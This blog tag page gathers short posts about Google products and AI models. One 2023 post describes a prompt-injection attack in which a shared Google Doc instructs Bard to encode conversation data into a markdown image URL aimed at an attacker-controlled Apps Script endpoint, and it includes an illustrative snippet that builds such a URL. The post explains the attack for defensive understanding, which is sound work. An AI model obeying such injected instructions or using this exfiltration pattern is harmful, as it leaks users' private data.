353 posts tagged “google”
2024
One consideration is that such a deep ML system could well be developed outside of Google-- at Microsoft, Baidu, Yandex, Amazon, Apple, or even a startup. My impression is that the Translate team experienced this. Deep ML reset the translation game; past advantages were sort of wiped out. Fortunately, Google's huge investment in deep ML largely paid off, and we excelled in this new game. Nevertheless, our new ML-based translator was still beaten on benchmarks by a small startup. The risk that Google could similarly be beaten in relevance by another company is highlighted by a startling conclusion from BERT: huge amounts of user feedback can be largely replaced by unsupervised learning from raw text. That could have heavy implications for Google.
— Eric Lehman, internal Google email in 2018
Google’s Gemini Advanced: Tasting Notes and Implications. Ethan Mollick reviews the new Google Gemini Advanced—a rebranded Bard, released today, that runs on the GPT-4-competitive Gemini Ultra model.
“GPT-4 [...] has been the dominant AI for well over a year, and no other model has come particularly close. Prior to Gemini, we only had one advanced AI model to look at, and it is hard drawing conclusions with a dataset of one. Now there are two, and we can learn a few things.”
I like Ethan’s use of the term “tasting notes” here. Reminds me of how Matt Webb talks about being a language model sommelier.
Google Research: Lumiere. The latest in text-to-video from Google Research, described as “a text-to-video diffusion model designed for synthesizing videos that portray realistic, diverse and coherent motion”.
Most existing text-to-video models generate keyframes and then use other models to fill in the gaps, which frequently leads to a lack of coherence. Lumiere “generates the full temporal duration of the video at once”, which avoids this problem.
Disappointingly but unsurprisingly, the paper doesn’t go into much detail on the training data, beyond stating “We train our T2V model on a dataset containing 30M videos along with their text caption. The videos are 80 frames long at 16 fps (5 seconds)”.
The examples of “stylized generation” which combine a text prompt with a single reference image for style are particularly impressive.
And now, in Anno Domini 2024, Google has lost its edge in search. There are plenty of things it can’t find. There are compelling alternatives. To me this feels like a big inflection point, because around the stumbling feet of the Big Tech dinosaurs, the Web’s mammals, agile and flexible, still scurry. They exhibit creative energy and strongly-flavored voices, and those voices still sometimes find and reinforce each other without being sock puppets of shareholder-value-focused private empires.
— Tim Bray
2023
Google DeepMind used a large language model to solve an unsolvable math problem. I’d been wondering how long it would be before we saw this happen: a genuine new scientific discovery found with the aid of a Large Language Model.
DeepMind found a solution to the previously open “cap set” problem using Codey, a fine-tuned variant of PaLM 2 specializing in code. They used it to generate Python code and found a solution after “a couple of million suggestions and a few dozen repetitions of the overall process”.
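The loop itself is simple to sketch. Here’s a toy illustration of the pattern (generate programs with a model, score them with a deterministic evaluator, feed the winners back into the prompt), where the “LLM” is faked with random string mutations so the example actually runs. None of these names come from DeepMind’s code, it’s just the shape of the idea:

```python
import random

SEED = "def answer():\n    return {n}\n"

def fake_llm(parents):
    # Stand-in for the code model: propose variations on the parent programs.
    return [SEED.format(n=random.randint(0, 100)) for _ in parents]

def evaluate(source):
    # Stand-in scorer: run the program and score its output (bigger is better).
    namespace = {}
    exec(source, namespace)
    return namespace["answer"]()

population = [(0, SEED.format(n=0))]
for generation in range(50):  # the real system ran millions of suggestions
    for source in fake_llm([s for _, s in population]):
        try:
            population.append((evaluate(source), source))
        except Exception:
            continue  # most generated programs fail; just discard them
    population = sorted(population, reverse=True)[:5]  # keep the strongest

print(population[0][1])  # the best program found
```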
Hacking Google Bard—From Prompt Injection to Data Exfiltration (via) Bard recently grew extension support, allowing it access to a user’s personal documents. Here’s the first reported prompt injection attack against that.
This kind of attack against LLM systems is inevitable any time you combine access to private data with exposure to untrusted inputs. In this case the attack vector is a Google Doc shared with the user, containing prompt injection instructions that instruct the model to encode previous data into an URL and exfiltrate it via a markdown image.
Google’s CSP headers restrict those images to *.google.com—but it turns out you can use Google AppScript to run your own custom data exfiltration endpoint on script.google.com.
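Here’s a sketch of what that exfiltration step looks like in practice. The endpoint ID and variable names below are hypothetical illustrations of mine, not the payload from the report:

```python
# Hypothetical illustration of the exfiltration step, not the actual payload.
# The injected instructions tell the model to take earlier conversation data,
# URL-encode it, and emit a markdown image pointing at an attacker-controlled
# Apps Script endpoint (which satisfies the *.google.com CSP restriction):
from urllib.parse import quote

conversation_data = "text the attacker wants to steal"
endpoint = "https://script.google.com/macros/s/EXAMPLE_DEPLOYMENT_ID/exec"
markdown_image = f"![img]({endpoint}?q={quote(conversation_data)})"
# When the chat UI renders this markdown, the browser requests the image URL,
# delivering the encoded data to the attacker's logs.
print(markdown_image)
```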
Google claim to have fixed the reported issue—I’d be interested to learn more about how that mitigation works, and how robust it is against variations of this attack.
Google was accidentally leaking its Bard AI chats into public search results. I’m quoted in this piece about yesterday’s Bard privacy bug: it turned out the share URL’s “Let anyone with the link see what you’ve selected” feature wasn’t correctly setting a noindex parameter, and so some shared conversations were being swept up by the Google search crawlers. Thankfully this was a mistake, not a deliberate design decision, and it should be fixed by now.
According to interviews with former employees, publishing executives, and experts associated with the early days of AMP, while it was waxing poetic about the value and future of the open web, Google was privately pushing publishers into handing over near-total control of how their articles worked and looked and monetized. And it was wielding the web’s most powerful real estate — the top of search results — to get its way.
Google Cloud: Available models in Generative AI Studio (via) Documentation for the PaLM 2 models available via API from Google. There are two classes of model—Bison (most capable) and Gecko (cheapest). text-bison-001 offers 8,192 input tokens and 1,024 output tokens; textembedding-gecko-001 returns 768-dimension embeddings for up to 3,072 tokens; chat-bison-001 is fine-tuned for multi-turn conversations. Most interestingly, those Bison models list their training data as “up to Feb 2023”—making them a whole lot more recent than the OpenAI September 2021 models.
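As a sketch of what calling these looks like, here’s my understanding of the Vertex AI Python SDK’s preview interface; check the documentation linked above for the authoritative version. The project ID and prompt are placeholders, and note that Vertex spells the model name as text-bison@001:

```python
# Minimal sketch of calling text-bison via the Vertex AI Python SDK
# (google-cloud-aiplatform). Project ID and prompt are placeholders.
import vertexai
from vertexai.preview.language_models import TextGenerationModel

vertexai.init(project="my-project-id", location="us-central1")
model = TextGenerationModel.from_pretrained("text-bison@001")
response = model.predict(
    "Give me four words that describe Google Cloud.",
    max_output_tokens=256,  # can go up to the 1,024 output token limit
)
print(response.text)
```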
The largest model in the PaLM 2 family, PaLM 2-L, is significantly smaller than the largest PaLM model but uses more training compute. Our evaluation results show that PaLM 2 models significantly outperform PaLM on a variety of tasks, including natural language generation, translation, and reasoning. These results suggest that model scaling is not the only way to improve performance. Instead, performance can be unlocked by meticulous data selection and efficient architecture/objectives. Moreover, a smaller but higher quality model significantly improves inference efficiency, reduces serving cost, and enables the model’s downstream application for more applications and users.
— PaLM 2 Technical Report, PDF
Leaked Google document: “We Have No Moat, And Neither Does OpenAI”
SemiAnalysis published something of a bombshell leaked document this morning: Google “We Have No Moat, And Neither Does OpenAI”.
[... 1,073 words]
Bard now helps you code (via) Google have enabled Bard’s code generation abilities—these were previously only available through jailbreaking. It’s pretty good—I got it to write me code to download a CSV file and insert it into a SQLite database—though when I challenged it to protect against SQL injection it hallucinated a non-existent “cursor.prepare()” method. Generated code can be exported to a Colab notebook with a click.
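For comparison, here’s roughly the code I was hoping for, written by hand. Python’s sqlite3 module protects against SQL injection with parameterized queries passed to execute(), not a prepare() method. The URL and table name are illustrative examples:

```python
# Download a CSV and insert it into SQLite. The correct way to protect
# against SQL injection here is parameterized queries: there is no
# cursor.prepare() method in Python's sqlite3 module.
import csv
import io
import sqlite3
import urllib.request

url = "https://example.com/data.csv"
with urllib.request.urlopen(url) as response:
    reader = csv.reader(io.TextIOWrapper(response, encoding="utf-8"))
    headers = next(reader)
    rows = list(reader)

db = sqlite3.connect("data.db")
# Column names can't be parameterized, so quote them explicitly:
columns = ", ".join('"{}"'.format(h.replace('"', '""')) for h in headers)
placeholders = ", ".join("?" for _ in headers)
db.execute(f"CREATE TABLE IF NOT EXISTS data ({columns})")
db.executemany(f"INSERT INTO data VALUES ({placeholders})", rows)
db.commit()
```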
If you ask Microsoft’s Bing chatbot if Google’s Bard chatbot has been shut down, it says yes, citing as evidence a news article that discusses a tweet in which a user asked Bard when it would be shut down and Bard said it already had, itself citing a comment from Hacker News in which someone joked about this happening, and someone else used ChatGPT to write fake news coverage about the event.
Don’t trust AI to talk accurately about itself: Bard wasn’t trained on Gmail
Earlier this month I wrote about how ChatGPT can’t access the internet, even though it really looks like it can. Consider this part two in the series. Here’s another common and non-intuitive mistake people make when interacting with large language model AI systems: asking them questions about themselves.
[... 1,950 words]
Here are some absurdly expensive things you can do on a trip to Tokyo: Buy a golden toilet. There is a toilet in Tokyo that is made of gold and costs around 10 million yen. If you are looking for a truly absurd experience, you can buy this toilet and use it for your next bowel movement. [...]
Google Bard is now live. Google Bard launched today. There’s a waiting list, but I made it through within a few hours of signing up, as did other people I’ve talked to. It’s similar to ChatGPT and Bing—it’s the same chat interface, and it can clearly run searches under the hood (though unlike Bing it doesn’t tell you what it’s looking for).
Exploring MusicCaps, the evaluation data released to accompany Google’s MusicLM text-to-music model
Google Research just released MusicLM: Generating Music From Text. It’s a new generative AI model that takes a descriptive prompt and produces a “high-fidelity” music track. Here’s the paper (and a more readable version using arXiv Vanity).
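If you want to poke at the evaluation data yourself, a few lines of pandas will do it. This assumes the musiccaps-public.csv file from Kaggle with ytid, start_s and caption columns, which is the schema as I found it; adjust if it differs:

```python
import pandas as pd

df = pd.read_csv("musiccaps-public.csv")
print(len(df), "clips")
# Each row is a ten-second YouTube clip with a human-written caption:
for row in df.head(3).itertuples():
    print(f"https://www.youtube.com/watch?v={row.ytid}&t={int(row.start_s)}")
    print(" ", row.caption[:100])
```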
[... 1,323 words]
2022
Does Company ‘X’ have an Azure Active Directory Tenant? (via) Neat write-up from Shawn Tabrizi about looking up whether a company has Active Directory single sign-on configured (which is based on OpenID Connect) by checking for an OpenID configuration endpoint. I particularly enjoyed this new-to-me trick: Google’s “I’m Feeling Lucky” search button redirects to the first result, which means it can double as an unofficial API endpoint for returning the URL of the first matching search result.
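The tenant check itself is a single HTTP request against the well-known OpenID Connect configuration URL. Here’s a sketch of the trick as I understand it (the function name is mine):

```python
# Ask login.microsoftonline.com for a domain's OpenID Connect configuration.
# A 200 response means the domain has an Azure AD tenant; an error response
# means it (probably) doesn't.
import urllib.error
import urllib.request

def has_azure_ad_tenant(domain):
    url = (
        "https://login.microsoftonline.com/"
        f"{domain}/v2.0/.well-known/openid-configuration"
    )
    try:
        urllib.request.urlopen(url)
        return True
    except urllib.error.HTTPError:
        return False

print(has_azure_ad_tenant("microsoft.com"))
```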
How Imagen Actually Works. Imagen is Google’s new text-to-image model, similar to (but possibly even more effective than) DALL-E. This article is the clearest explanation I’ve seen of how Imagen works: it uses Google’s existing T5 text encoder to convert the input sentence into an encoding that captures the semantic meaning of the sentence (including things like items being described as being on top of other items), then uses a trained diffusion model to generate a 64x64 image. That image is passed through two super-res models to increase the resolution to the final 1024x1024 output.
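Here’s a shape-level Python sketch of that cascade. The three functions are empty stand-ins of my own invention, purely to show how the stages plug together:

```python
# Shape-level sketch of the Imagen cascade described above. The functions
# just return arrays of the right shape so the pipeline runs; the real
# models are trained networks.
import numpy as np

def t5_encode(prompt):
    # Stand-in for the frozen T5-XXL text encoder: one embedding per token.
    return np.zeros((len(prompt.split()), 4096))

def base_diffusion(text_embedding):
    # Stand-in for the text-conditioned base diffusion model: 64x64 RGB.
    return np.zeros((64, 64, 3))

def super_resolution(image, size, text_embedding):
    # Stand-in for the two text-conditioned super-resolution models.
    return np.zeros((size, size, 3))

embedding = t5_encode("a corgi riding a skateboard")
image = base_diffusion(embedding)                # 64x64
image = super_resolution(image, 256, embedding)  # 64 -> 256
image = super_resolution(image, 1024, embedding) # 256 -> 1024
print(image.shape)  # (1024, 1024, 3)
```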
How to push tagged Docker releases to Google Artifact Registry with a GitHub Action. Ben Welsh’s writeup includes detailed step-by-step instructions for getting the mysterious “Workload Identity Federation” mechanism to work with GitHub Actions and Google Cloud. I’ve been dragging my heels on figuring this out for quite a while, so it’s great to see the steps described at this level of detail.
2021
Google Public DNS Flush Cache (via) Google Public DNS (8.8.8.8) have a flush cache page too.
Allo shows the ultimate failure of Google's Minimum Viable Product strategy. MVP works when you have almost no competition, or if you are taking a radically different approach to what's on the market, but it completely falls on its face when you are just straight-up cloning an established competitor. There's no reason to use a half-baked WhatsApp clone when regular WhatsApp exists.
google-cloud-4-words. This is really useful: every Google Cloud service (all 250 of them) with a four-word description explaining what it does. I’d love to see the same thing for AWS. UPDATE: Turns out I already had—I can’t link to other posts from blogmark descriptions yet, so search “aws explained” on this site to find it.
2020
Apple now receives an estimated $8 billion to $12 billion in annual payments — up from $1 billion a year in 2014 — in exchange for building Google’s search engine into its products. It is probably the single biggest payment that Google makes to anyone and accounts for 14 to 21 percent of Apple’s annual profits.
Design Docs at Google. Useful description of the format used for software design docs at Google—informal documents of between 3 and 20 pages that outline the proposed design of a new project, discuss trade-offs that were considered and solicit feedback before the code starts to be written.
The unofficial Google Cloud Run FAQ. This is really useful: a no-fluff, content rich explanation of Google Cloud Run hosted as a GitHub repo that actively accepts pull requests from the community. It’s maintained by Ahmet Alp Balkan, a Cloud Run engineer who states “Googlers: If you find this repo useful, you should recognize the work internally, as I actively fight for alternative forms of content like this”. One of the hardest parts of working with AWS and GCP is digging through the marketing materials to figure out what the product actually does, so the more alternative forms of documentation like this the better.
Why Google invested in providing Google Fonts for free. Fascinating comment from former Google Fonts team member Raph Levien. In short: text rendered as PNGs hurts Google Search, fonts were a delay in the transition from Flash, Google Docs needed them to better compete with Office, and anything that helps create better ads is easy to find funding for.
Portable Cloud Functions with the Python Functions Framework (via) The new functions-framework library on PyPI lets you run Google Cloud Functions written in Python in other environments—on your local developer machine or bundled in a Docker container for example. I have real trouble trusting serverless platforms that lock you into a single provider (AWS Lambda makes me very uncomfortable) so this is a breath of fresh air.
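Here’s what a minimal function looks like, based on the pattern in the library’s documentation; the framework routes HTTP requests to a plain function that receives a Flask request object:

```python
# main.py: a minimal HTTP function for the Python Functions Framework.
def hello(request):
    name = request.args.get("name", "world")
    return f"Hello, {name}!"
```

Run `functions-framework --target=hello` and it serves on http://localhost:8080; the same code should deploy unchanged to Google Cloud Functions.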
2019
In general, reviewers should favor approving a CL [changelist] once it is in a state where it definitely improves the overall code health of the system being worked on, even if the CL isn’t perfect.
Cloud Run Button: Click-to-deploy your git repos to Google Cloud (via) Google Cloud Run now has its own version of the Heroku deploy button: you can add a button to a GitHub repository which, when clicked, will provide an interface for deploying your repo to the user’s own Google Cloud account using Cloud Run.